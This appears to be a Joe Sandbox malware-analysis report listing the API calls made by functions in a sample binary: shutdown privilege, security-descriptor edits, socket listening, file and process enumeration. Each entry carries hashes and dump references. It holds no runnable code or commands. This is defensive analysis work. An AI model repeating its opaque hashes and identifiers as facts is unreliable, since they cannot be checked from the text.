                                                                                                                    • Instruction Fuzzy Hash: EE413E726403186BD720DB54DC45FDFB3BCFF58710F00859AFA0896191EBB49A548BD8
                                                                                                                    Function 004720DB Relevance: 21.4, APIs: 11, Strings: 1, Instructions: 377timeCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetLocalTime.KERNEL32(?), ref: 004722A2
                                                                                                                    • __swprintf.LIBCMT ref: 004722B9
                                                                                                                    • SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,0048BF68), ref: 004724EC
                                                                                                                    • SHGetFolderPathW.SHELL32(00000000,0000002B,00000000,00000000,0048BF68), ref: 00472506
                                                                                                                    • SHGetFolderPathW.SHELL32(00000000,00000005,00000000,00000000,0048BF68), ref: 00472520
                                                                                                                    • SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,0048BF68), ref: 0047253A
                                                                                                                    • SHGetFolderPathW.SHELL32(00000000,00000019,00000000,00000000,0048BF68), ref: 00472554
                                                                                                                    • SHGetFolderPathW.SHELL32(00000000,0000002E,00000000,00000000,0048BF68), ref: 0047256E
                                                                                                                    • SHGetFolderPathW.SHELL32(00000000,0000001F,00000000,00000000,0048BF68), ref: 00472588
                                                                                                                    • SHGetFolderPathW.SHELL32(00000000,00000017,00000000,00000000,0048BF68), ref: 004725A2
                                                                                                                    • SHGetFolderPathW.SHELL32(00000000,00000016,00000000,00000000,0048BF68), ref: 004725BC
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FolderPath$LocalTime__swprintf
                                                                                                                    • String ID: %.3d
                                                                                                                    • API String ID: 3337348382-986655627
                                                                                                                    • Opcode ID: e729fe0eecd02e77c5ee8deaec4c56456965897f8b2a75efd2bc4ea0d4b88c57
                                                                                                                    • Instruction ID: 0d137f706e98bab13a4a4c7fcb7914b07bdb7c22a72ec07ab57cd4d47a51df83
                                                                                                                    • Opcode Fuzzy Hash: e729fe0eecd02e77c5ee8deaec4c56456965897f8b2a75efd2bc4ea0d4b88c57
                                                                                                                    • Instruction Fuzzy Hash: A6C1EC326101185BD710FBA1DD8AFEE7328EB44701F5045BFF909A60C2DBB99B598F64
                                                                                                                    Function 00442886 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 135fileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 004428A8
                                                                                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 0044290B
                                                                                                                    • FindClose.KERNEL32(00000000), ref: 0044291C
                                                                                                                    • FindClose.KERNEL32(00000000), ref: 00442930
                                                                                                                    • FindFirstFileW.KERNEL32(*.*,?), ref: 0044294D
                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 0044299C
                                                                                                                    • SetCurrentDirectoryW.KERNEL32(0048AB30), ref: 004429BF
                                                                                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 004429C9
                                                                                                                    • FindClose.KERNEL32(00000000), ref: 004429D4
                                                                                                                      • Part of subcall function 00433C08: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00433C2A
                                                                                                                    • FindClose.KERNEL32(00000000), ref: 004429E2
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                                                                                    • String ID: *.*
                                                                                                                    • API String ID: 2640511053-438819550
                                                                                                                    • Opcode ID: 8a47bb142582fb369a588aeabde8b58686abdf3d8367fad8d2448c9b03ae91f1
                                                                                                                    • Instruction ID: 696d482812dd8bff2d9106dd2d2144e175b5fe2258968c3fd44c1969776f6f9a
                                                                                                                    • Opcode Fuzzy Hash: 8a47bb142582fb369a588aeabde8b58686abdf3d8367fad8d2448c9b03ae91f1
                                                                                                                    • Instruction Fuzzy Hash: AD410AB2A001186BDB10EBA5ED45FEF73689F89321F50465BFD0493280D6B8DE558BB8
                                                                                                                    Function 004333BE Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 86shutdownCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetCurrentProcess.KERNEL32(00000028,?), ref: 004333CE
                                                                                                                    • OpenProcessToken.ADVAPI32(00000000), ref: 004333D5
                                                                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004333EA
                                                                                                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 0043340E
                                                                                                                    • GetLastError.KERNEL32 ref: 00433414
                                                                                                                    • ExitWindowsEx.USER32(?,00000000), ref: 00433437
                                                                                                                    • InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?), ref: 00433466
                                                                                                                    • SetSystemPowerState.KERNEL32(00000001,00000000), ref: 00433479
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ProcessSystemToken$AdjustCurrentErrorExitInitiateLastLookupOpenPowerPrivilegePrivilegesShutdownStateValueWindows
                                                                                                                    • String ID: SeShutdownPrivilege
                                                                                                                    • API String ID: 2938487562-3733053543
                                                                                                                    • Opcode ID: e998af62085c6697935ed50d35c6a1543144275e53dff9101095b3913992069c
                                                                                                                    • Instruction ID: ad32a9094aef850e2966724807b7d50af50c82f056daff98c21d8f44207777ad
                                                                                                                    • Opcode Fuzzy Hash: e998af62085c6697935ed50d35c6a1543144275e53dff9101095b3913992069c
                                                                                                                    • Instruction Fuzzy Hash: F221C971640205ABF7108FA4EC4EF7FB3ACE708702F144569FE09D51D1D6BA5D408765
                                                                                                                    Function 00446124 Relevance: 16.7, APIs: 11, Instructions: 182COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00436E45
                                                                                                                      • Part of subcall function 00436E2B: GetLastError.KERNEL32(?,00000000,?), ref: 00436E4F
                                                                                                                      • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00436E75
                                                                                                                      • Part of subcall function 00436DF7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 00436E12
                                                                                                                    • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0044618A
                                                                                                                    • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 004461BE
                                                                                                                    • GetLengthSid.ADVAPI32(?), ref: 004461D0
                                                                                                                    • GetAce.ADVAPI32(?,00000000,?), ref: 0044620D
                                                                                                                    • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00446229
                                                                                                                    • GetLengthSid.ADVAPI32(?), ref: 00446241
                                                                                                                    • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0044626A
                                                                                                                    • CopySid.ADVAPI32(00000000), ref: 00446271
                                                                                                                    • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 004462A3
                                                                                                                    • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 004462C5
                                                                                                                    • SetUserObjectSecurity.USER32(?,00000004,?), ref: 004462D8
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Security$DescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1255039815-0
                                                                                                                    • Opcode ID: cf498e736c0040d611dc61921388a4e783ba54ad69564fff20abd6321b712b19
                                                                                                                    • Instruction ID: cbecfdc94e872455e881353a2ef69e95113e06a92746e25f2a634f38edc45108
                                                                                                                    • Opcode Fuzzy Hash: cf498e736c0040d611dc61921388a4e783ba54ad69564fff20abd6321b712b19
                                                                                                                    • Instruction Fuzzy Hash: C251BC71A00209BBEB10EFA1CD84EEFB778BF49704F01855EF515A7241D6B8DA05CB69
                                                                                                                    Function 0043305F Relevance: 16.6, APIs: 11, Instructions: 122COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • __swprintf.LIBCMT ref: 00433073
                                                                                                                    • __swprintf.LIBCMT ref: 00433085
                                                                                                                    • __wcsicoll.LIBCMT ref: 00433092
                                                                                                                    • FindResourceW.KERNEL32(?,?,0000000E), ref: 004330A5
                                                                                                                    • LoadResource.KERNEL32(?,00000000), ref: 004330BD
                                                                                                                    • LockResource.KERNEL32(00000000), ref: 004330CA
                                                                                                                    • FindResourceW.KERNEL32(?,?,00000003), ref: 004330F7
                                                                                                                    • LoadResource.KERNEL32(?,00000000), ref: 00433105
                                                                                                                    • SizeofResource.KERNEL32(?,00000000), ref: 00433114
                                                                                                                    • LockResource.KERNEL32(?), ref: 00433120
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Resource$FindLoadLock__swprintf$Sizeof__wcsicoll
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1158019794-0
                                                                                                                    • Opcode ID: b140e135c5f727b40d296f2f4b3108eaeb1a217ee9fa6a28346dce69b8385e70
                                                                                                                    • Instruction ID: 48d2d5a3af9b637b7fc6f2c6b5a7fdd3517197a5f8dc2ef3994740021b7ed835
                                                                                                                    • Opcode Fuzzy Hash: b140e135c5f727b40d296f2f4b3108eaeb1a217ee9fa6a28346dce69b8385e70
                                                                                                                    • Instruction Fuzzy Hash: C741F1322002146BDB10EF65EC84FAB37ADEB89321F00846BFD01C6245E779DA51C7A8
                                                                                                                    Function 0045A10F Relevance: 16.6, APIs: 11, Instructions: 120clipboardmemoryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1737998785-0
                                                                                                                    • Opcode ID: bc1c5a0e04e7211697dd638385d424d337038878635646daacac479226a8eb74
                                                                                                                    • Instruction ID: d84b136cee2c902db59abfe4f82a3f409d39725fe24efd6a62fd8a04edebb5dd
                                                                                                                    • Opcode Fuzzy Hash: bc1c5a0e04e7211697dd638385d424d337038878635646daacac479226a8eb74
                                                                                                                    • Instruction Fuzzy Hash: 334114726001119FC310EFA5EC89B5EB7A4FF54315F00856EF909EB3A1EB75A941CB88
                                                                                                                    Function 0045D619 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 107COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SetErrorMode.KERNEL32(00000001), ref: 0045D627
                                                                                                                    • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,?), ref: 0045D6B5
                                                                                                                    • GetLastError.KERNEL32 ref: 0045D6BF
                                                                                                                    • SetErrorMode.KERNEL32(00000000,?), ref: 0045D751
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Error$Mode$DiskFreeLastSpace
                                                                                                                    • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                                                    • API String ID: 4194297153-14809454
                                                                                                                    • Opcode ID: 7585e308607772b0055f7746bf91c511cc03d2319b95ee688ecb5d1da683c46d
                                                                                                                    • Instruction ID: 1f300c266cb1daf6abeae651b696e439ee3a0372042695327ab67fb83666ce96
                                                                                                                    • Opcode Fuzzy Hash: 7585e308607772b0055f7746bf91c511cc03d2319b95ee688ecb5d1da683c46d
                                                                                                                    • Instruction Fuzzy Hash: FE418235D00209DFCB10EFA5C884A9DB7B4FF48315F10846BE905AB352D7799A85CB69
                                                                                                                    Function 0044EB5F Relevance: 12.9, APIs: 3, Strings: 4, Instructions: 643COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _memmove$_strncmp
                                                                                                                    • String ID: @oH$\$^$h
                                                                                                                    • API String ID: 2175499884-3701065813
                                                                                                                    • Opcode ID: 988809b36a944a9929e300e154a4cfc85b4d4f50dea7e6e4a67b5f519bc2876c
                                                                                                                    • Instruction ID: 796dcd1322dc9123c5f4e5533c800aedaabe8dca19c5b95ba0af32eff2573e22
                                                                                                                    • Opcode Fuzzy Hash: 988809b36a944a9929e300e154a4cfc85b4d4f50dea7e6e4a67b5f519bc2876c
                                                                                                                    • Instruction Fuzzy Hash: 4242E170E04249CFEB14CF69C8806AEBBF2FF85304F2481AAD856AB351D7399946CF55
                                                                                                                    Function 004652BE Relevance: 12.1, APIs: 8, Instructions: 97networkCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • socket.WSOCK32(00000002,00000001,00000006,00000000), ref: 0046530D
                                                                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 0046531C
                                                                                                                    • bind.WSOCK32(00000000,?,00000010), ref: 00465356
                                                                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00465363
                                                                                                                    • closesocket.WSOCK32(00000000,00000000), ref: 00465377
                                                                                                                    • listen.WSOCK32(00000000,00000005), ref: 00465381
                                                                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 004653A9
                                                                                                                    • closesocket.WSOCK32(00000000,00000000), ref: 004653BD
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorLast$closesocket$bindlistensocket
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 540024437-0
                                                                                                                    • Opcode ID: 56b395d1b7441155ee1d78469f99a9871a9e2360f64803e3ab449944eb02724f
                                                                                                                    • Instruction ID: 689f190a2b8ca197395c4559ba4ec64c13dad074e2778b61c05f6be918bdb8b0
                                                                                                                    • Opcode Fuzzy Hash: 56b395d1b7441155ee1d78469f99a9871a9e2360f64803e3ab449944eb02724f
                                                                                                                    • Instruction Fuzzy Hash: A8319331200500ABD310EF25DD89B6EB7A8EF44725F10866EF855E73D1DBB4AC818B99
                                                                                                                    Function 0044663B Relevance: 11.4, APIs: 1, Strings: 5, Instructions: 895COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: ERCP$VUUU$VUUU$VUUU$XjH
                                                                                                                    • API String ID: 0-2872873767
                                                                                                                    • Opcode ID: 34fecdbc504fccc055e136d4951117c2a740426f4eee1b738e863fbded63ce7f
                                                                                                                    • Instruction ID: d175e7d0ae6fb3d700f9da8fb6b70819649eb02c4ceaf458d011f7582104736e
                                                                                                                    • Opcode Fuzzy Hash: 34fecdbc504fccc055e136d4951117c2a740426f4eee1b738e863fbded63ce7f
                                                                                                                    • Instruction Fuzzy Hash: D772D871A042198BEF24CF58C8807AEB7F1EB42314F25829BD859A7380D7799DC5CF5A
                                                                                                                    Function 004755C4 Relevance: 10.6, APIs: 7, Instructions: 148processCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • CreateToolhelp32Snapshot.KERNEL32 ref: 00475608
                                                                                                                    • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00475618
                                                                                                                    • __wsplitpath.LIBCMT ref: 00475644
                                                                                                                      • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                                                                                    • _wcscat.LIBCMT ref: 00475657
                                                                                                                    • __wcsicoll.LIBCMT ref: 0047567B
                                                                                                                    • Process32NextW.KERNEL32(00000000,?), ref: 004756AB
                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 004756BA
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wcsicoll__wsplitpath__wsplitpath_helper_wcscat
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2547909840-0
                                                                                                                    • Opcode ID: 9e44ac92eedd99fdf3f2932738b6949334d3f24a3592eb41664da5fdf167909f
                                                                                                                    • Instruction ID: 52239f647ae7113ca4c6e3167181772f82882466072c53a1302db900a9aecbbd
                                                                                                                    • Opcode Fuzzy Hash: 9e44ac92eedd99fdf3f2932738b6949334d3f24a3592eb41664da5fdf167909f
                                                                                                                    • Instruction Fuzzy Hash: B3518671900618ABDB10DF55CD85FDE77B8EF44704F1084AAF509AB282DA75AF84CF68
                                                                                                                    Function 00452492 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 128filesleepCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                                      • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 004524DF
                                                                                                                    • Sleep.KERNEL32(0000000A), ref: 0045250B
                                                                                                                    • FindNextFileW.KERNEL32(?,?), ref: 004525E9
                                                                                                                    • FindClose.KERNEL32(?), ref: 004525FF
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
